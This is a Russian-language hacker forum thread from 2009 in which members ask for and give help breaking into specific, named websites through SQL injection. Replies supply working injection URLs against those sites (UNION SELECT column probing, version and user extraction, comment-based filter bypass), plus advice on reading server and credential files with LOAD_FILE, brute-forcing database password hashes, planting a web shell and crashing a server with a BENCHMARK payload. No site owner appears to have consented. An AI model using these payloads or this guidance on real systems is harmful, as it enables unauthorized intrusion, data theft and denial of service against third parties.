RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-28 17:47:36.223333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Ну тогда вариант 2) Умыкни через него пароли у админа. Но это постараться придется.
А вообще, насколько я понял, кодер - дурак, раз пропустил дыры, а вот админ толковый - правильной настройкой прав обломал всю малину.
Вывод: поищи на сайте еще дыры. В частности проверь форумы, коментарии и т.д. на наличие активной XSS. Это все же будет приятней, чем SiXSS.
P.S. И еще. Проверь инъекции во всех возможных скриптах. А вдруг разные скрипты пользуются разными учетками. И вдруг у какой-нибудь учетки хватит прав на нужные тебе таблицы.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-28 17:57:50.623333
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
Блин, http://www.webmarket.mobi/news.php?id=-25+union+select+1,2,3,4,5,6– как шелл залить!?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-28 18:41:08.540000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Кавычки фильтруются. Значит через INTO OUTFILE шелл не залить.
Как вариант: добыть учетку к базе, приконнектится к ней напрямую, и тогда уже лить шелл.
Учетку можно добыть двумя методами:
1) из mysql.user и сбрутить пароль
2) через LOAD_FILE() прочитать скрипты и в них найти логин и пароль.
Все зависит от настройки прав. Сам пробовать не стал.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-28 18:41:59.070000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
file_priv = N
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-28 23:47:46.920000
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
народ, интересна такая вещь как дос атака при наличие скулы…. в общем я знаю, что проводить её надо чероез benchmark, а именно: http://xxx/news.php?id=-1'+UNION+SELECT+1, 2,BENCHMARK(100000,BENCHMARK(100000,md5(current_time ))), 4, 5, 6–
вроде бы надо нажать обновить раз сто и серв упадёт в беспробудный даун, так вот вопрсо надо нажать обновить раз сто и подождать пока обновится или просто много раз тыкать, кто сталкивался отпишитесь плз
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-01 00:40:50.150000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
Delete
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-01 13:30:38.366666
|
|
|
spiritroot
Сообщений: 22
Оценки: 0
Присоединился: 2008-10-21 13:16:28.616666
|
Здравствуйте товарищи форумчане (прошу не пинать)
Порылся в сети и откопал куеву тучу сайтов на которых можно произвести SQL-injection.
Но вот возникла проблема
Допустим я нашол сайт http:/syte.com//article.php?id=1
при подставление ковычки получаю сообщения -
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=1\' ORDER BY lastname
Значит SQL-injection. возможна,я прав?
Но при всех дальнейших действиях -
http:/syte.com//article.php?id=1+order+by+10
получаю следующее
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=1 order by 10 ORDER BY lastname
По советуйте в как дальше быть.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-01 15:22:10.590000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
вариант первый: почитай мануал по скул инъектам
вариант второй: убейся ап стену
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-01 18:28:02.786666
|
|
|
ASMi368
Сообщений: 16
Оценки: 0
Присоединился: 2008-06-24 15:24:10.873333
|
Благодарю за советы! Админ судя по всему действительно толковый, а вот кодер - практически каждый скрипт бажный… ничего в итоге не вышло!:(
Посоветуйте еще пожалуйста где взять хороший брутер названий таблиц и словарь нормальный к нему (кроме SQL Injection Tools только)? Попробую сбрутить - последняя надежда!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-05 01:23:50.220000
|
|
|
luxxx
Сообщений: 1
Оценки: 0
Присоединился: 2009-03-05 01:04:51.016666
|
Здрасьте Всем ! У меня вопрос: я нашёл нечто похожее на sQL Injection.
Cat.asp?&idx=176 , так вот кол-во полей я подобрал, принтабельные тоже нашёл.
И обнаружил что при запросе типа:
Cat.asp?&idx=-1+union+select+1,2,3,4,'<HTMl-код>',6,7,8,9,10,11,12,13
любой HTML выполняется…….
ВОПРОС: Подскажите ПЛИЗ, как это можно эксплуатировать ???????????????????????
Заранее СПАСИБО !!!!!!!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-05 01:41:51.510000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Прочти хоть один мануал по sql inj…
http://forum.antichat.ru/thread43966.html
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-06 20:39:34.806666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
http://www.rfbd.ru/cat.php?region=0\'&rubrika=13
плз помогите раскурить
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-06 20:51:22.816666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.rfbd.ru/cat.php?region=0+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20--&rubrika=13
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-06 20:59:41.053333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://www.rfbd.ru/cat.php?region=0+and+substring(version(),1,1)=5
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-06 23:17:02.623333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
Спасибо!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-07 17:35:03.180000
|
|
|
ZloScript
Сообщений: 72
Оценки: 0
Присоединился: 2008-09-17 01:33:59.556666
|
Народ кто знает как узнать через мускул в какой дире лиит сайт
Я знаю только один способ open_file('\')
Но он не выводит диру а просто пишет о ошибке в запросе
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-07 17:51:18.990000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
load_file('/etc/httpd/conf/httpd.conf')
load_file('/')
Часто кавычки не проходят, поэтому кодируем в hex.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-08 23:53:31.570000
|
|
|
lito777
Сообщений: 51
Оценки: 0
Присоединился: 2009-01-30 04:52:45.883333
|
что то не смог подобрать количество столбцов к
http://www.strafrecht-online.org/index.php?scr=lvs_downloads&lvs_id=-1777
помогите пожалуйста
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-08 23:55:27.396666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Как ты подбирал-то?
http://www.strafrecht-online.org/index.php?scr=lvs_downloads&lvs_id=-1777+union+select+1--
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-10 04:32:35.190000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
http://rwt.ru/view.asp?type=0&sortby=0&mode=adv&from=1'
плз подскажите как тут разобраться или сделать правильный запрос
тут все на vsb скрипте
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-10 04:56:56.293333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну попробуй туда order+by+1 вставить.. прокатывает?
Значит нет…
Ищи в другом месте.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-10 05:12:29.513333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
2 bobik23
_rwt.ru/news.asp?showbyid={тут например))}
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-12 19:09:41.100000
|
|
|
igorec4
Сообщений: 2
Оценки: 0
Присоединился: 2006-10-16 13:58:10.303333
|
Помогите разобраться!
Запрос такой
?cu=TT<script>alert('ok')</script>
вылитело окно – ок
На странице появилось
Error in query
SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1
Вот мучаю скуль и никак пройти в перед не могу.
через order+by показывает 1 поле.
если поставить ' ошибка.
'/* ошибки нету.
?cu=TT%27+union+select+111/*
You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1
?cu=TT%27%2520union%2520select%2520null/*
Unknown column '20union' in 'where clause'
?cu=TT%27+and+(select+111)/*
You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-12 19:36:18.266666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ссылку в студию.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-12 21:26:24.690000
|
|
|
lito777
Сообщений: 51
Оценки: 0
Присоединился: 2009-01-30 04:52:45.883333
|
помогите количество столюцив подобрать
http://www.usadba.ru/city/sale_search?fl_type_id=2'&fl_repair_id=&hs_has_parking=&sqr_min=&sqr_max=&count_fl=366'&offset=-20
а то что-то не получается
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-12 22:34:23.450000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.usadba.ru/city/sale_search?fl_type_id=2/**/order/**/by/**/2--&fl_repair_id=&hs_has_parking=&sqr_min=&sqr_max=&count_fl=366&offset=0
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-12 23:51:13.876666
|
|
|
lito777
Сообщений: 51
Оценки: 0
Присоединился: 2009-01-30 04:52:45.883333
|
спасибо r1dex
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 15:39:14.136666
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
An error was encountered
File: /var/www/new/search.php
Line: 282
Site reported: Unable to fetch search results
Database reported: ERROR: syntax error at or near "as" at character 228
Failed query: SELECT t.id AS tid, t.poster, t.subject, t.last_post, t.last_post_id, t.last_poster, t.num_replies, t.closed, t.forum_id FROM pun_posts AS posts INNER JOIN pun_topics AS t ON t.id=posts.topic_id WHERE t.id IN(SELECT t.id FROM as p INNER JOIN pun_topics AS t ON t.id=p.tid INNER JOIN pun_forums AS f ON f.id=t.forum_id LEFT JOIN pun_forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id=3) WHERE ( ( fp.read_forum IS NULL OR fp.read_forum=1 )) AND t.forum_id = 2 GROUP BY t.id) GROUP BY t.id, t.poster, t.subject, t.last_post, t.last_post_id, t.last_poster, t.num_replies, t.closed, t.forum_id, t.posted ORDER BY t.posted DESC LIMIT 26 OFFSET 0
На одном сайте в поиске ввел 4 ковычки и получил то что написанно сверху. что это может дать, я совсем новенький, пытаюсь разобраться.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 15:58:21.833333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Blind SQL-inj это тебе может дать
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 16:37:10.273333
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Слепая SQL inj? А что дальше делать?)) извеняюсь за нубство))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 16:46:20.460000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ссылку дальше кидать.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 17:52:56.153333
|
|
|
Ravin
Сообщений: 185
Оценки: 0
Присоединился: 2009-03-11 19:54:09.366666
|
скажите а это что такое http://vkontakte.ru/groups.php?act=enter&gid=6914545
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 18:02:46.196666
|
|
|
John.
Сообщений: 448
Оценки: 0
Присоединился: 2008-06-06 13:46:52.593333
|
quote:
ORIGINAL: Ravin
скажите а это что такое http://vkontakte.ru/groups.php?act=enter&gid=6914545
типо нарушение безопастности
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-13 19:16:31.746666
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
http://hostel.nstu.ru/search.php вот сайт на нем когда в поле поиска пишшиь три овычки появляеться вот это:
An error was encountered
File: /var/www/new/search.php
Line: 282
Site reported: Unable to fetch search results
Database reported: ERROR: syntax error at or near "as" at character 228
Failed query: SELECT t.id AS tid, t.poster, t.subject, t.last_post, t.last_post_id, t.last_poster, t.num_replies, t.closed, t.forum_id FROM pun_posts AS posts INNER JOIN pun_topics AS t ON t.id=posts.topic_id WHERE t.id IN(SELECT t.id FROM as p INNER JOIN pun_topics AS t ON t.id=p.tid INNER JOIN pun_forums AS f ON f.id=t.forum_id LEFT JOIN pun_forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id=3) WHERE ( ( fp.read_forum IS NULL OR fp.read_forum=1 )) AND t.forum_id = 2 GROUP BY t.id) GROUP BY t.id, t.poster, t.subject, t.last_post, t.last_post_id, t.last_poster, t.num_replies, t.closed, t.forum_id, t.posted ORDER BY t.posted DESC LIMIT 26 OFFSET 0
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 10:00:54.273333
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Вот еще:
http://darkomen.ru/?go=19&indx=2980
http://darkomen.ru/?go=19&indx=2983-3 появляеться тоже самое что и http://darkomen.ru/?go=19&indx=2980
помогите разобраться что делать.
Еще http://darkomen.ru/?go=19&indx=2980;– если писать так то выводит тоже самое что и http://darkomen.ru/?go=19&indx=2980
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 10:14:50.330000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,3,4,5,6,7,8,9,0,11,12--
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 10:31:05.690000
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Ну получается 12 полей, а как они читаются?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 10:34:31.033333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6,7,8,9,0,11,12--
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 11:21:50.850000
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Так я там определил имя юзера владельца БД и имя базы данных юзера. Что теперь с этим делать?
|
|
|
|
|
|
